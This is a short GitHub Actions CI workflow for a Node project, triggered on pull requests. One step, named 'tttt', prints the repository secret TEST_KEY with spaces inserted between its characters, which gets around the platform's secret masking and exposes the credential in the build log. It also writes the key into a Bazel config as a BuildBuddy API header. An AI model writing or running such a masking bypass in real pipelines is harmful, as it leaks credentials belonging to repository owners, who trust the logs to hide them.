name: CI

on:
  pull_request:
    types: ['opened', 'reopened', 'synchronize']

jobs:
  build:
    environment: TEST_KEY
    runs-on: ${{ matrix.os }}
    strategy:
      matrix:
        node: [ '16' ]
        os: [ ubuntu-latest ]

    name: ${{ matrix.os }} / Node ${{ matrix.node }}

    steps:
    - uses: actions/checkout@v2
    - uses: actions/setup-node@v1
      with:
        node-version: ${{ matrix.node }}
    - name: tttt
      env:
        TEST_KEY: ${{ secrets.TEST_KEY }}
      run: |
        echo ""
        echo ${{secrets.TEST_KEY}} | sed 's/./& /g'
        echo "build --remote_header=x-buildbuddy-api-key=$TEST_KEY" > .bazelrc.user
        tail -c 3 ./.bazelrc.user
